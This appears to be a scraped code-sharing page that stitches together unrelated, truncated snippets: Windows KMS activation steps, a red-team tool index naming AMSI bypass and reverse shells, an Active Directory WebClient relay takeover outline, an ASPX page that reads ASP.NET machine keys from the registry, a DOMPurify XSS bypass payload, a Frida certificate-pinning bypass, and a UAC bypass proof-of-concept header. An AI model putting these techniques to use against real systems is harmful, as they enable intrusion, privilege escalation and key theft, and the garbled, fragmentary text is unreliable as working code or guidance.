samy4samy

For Windows 10

Step 1 - Open PowerShell or Command Prompt as administrator

Step 2 - Install KMS client key

slmgr /ipk your_license_key

Replace your_license_key with following volumn license keys according to Windows Edition:

Red Teaming tool

General usefull Powershell Scripts
AMSI Bypass restriction Bypass
Payload Hosting
Network Share Scanner
Lateral Movement
Reverse Shellz
POST Exploitation

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

	<!DOCTYPE html>
	<html>
	<head>
	<title></title>
	<style type="text/css">

	body {
	display: none !important;
	background:#FFFFFF !important;
	}

	<%@ Page Language="C#" %>
	<%
	// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
	Response.Write("<br/><hr/>");
	byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
	if(autoGenKeyV4!=null)
	Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
	Response.Write("<br/>");
	byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
	if(autoGenKey!=null)

	const createDOMPurify = require("dompurify");
	const { JSDOM } = require("jsdom");
	const http = require("http");

	const server = http.createServer((req, res) => {
	const window = new JSDOM("").window;
	const DOMPurify = createDOMPurify(window);
	const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);

	res.statusCode = 200;

	// Website you intended to retrieve for users.
	const upstream = 'api.openai.com'

	// Custom pathname for the upstream website.
	const upstream_path = '/'

	// Website you intended to retrieve for users using mobile devices.
	const upstream_mobile = upstream

	// Countries and regions where you wish to suspend your service.

	#!/usr/bin/python3
	from __future__ import division
	from __future__ import print_function
	import re
	import codecs
	import logging
	import time
	import argparse
	import sys
	from impacket import version

	// start with:
	// frida -U -l pinning.js -f [APP_ID] --no-pause

	Java.perform(function () {
	console.log('')
	console.log('===')
	console.log('* Injecting hooks into common certificate pinning methods *')
	console.log('===')

	var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');

	/*
	TaskManagerSecret

	Author: @splinter_code

	This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
	The core of this hack is stealing and using a token containing the UIAccess flag set.
	A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
	From there it uses a task manager "feature" to run a new High IL cmd.exe.
	This has been developed only for fun and shouldn't be used due to its high unreliability.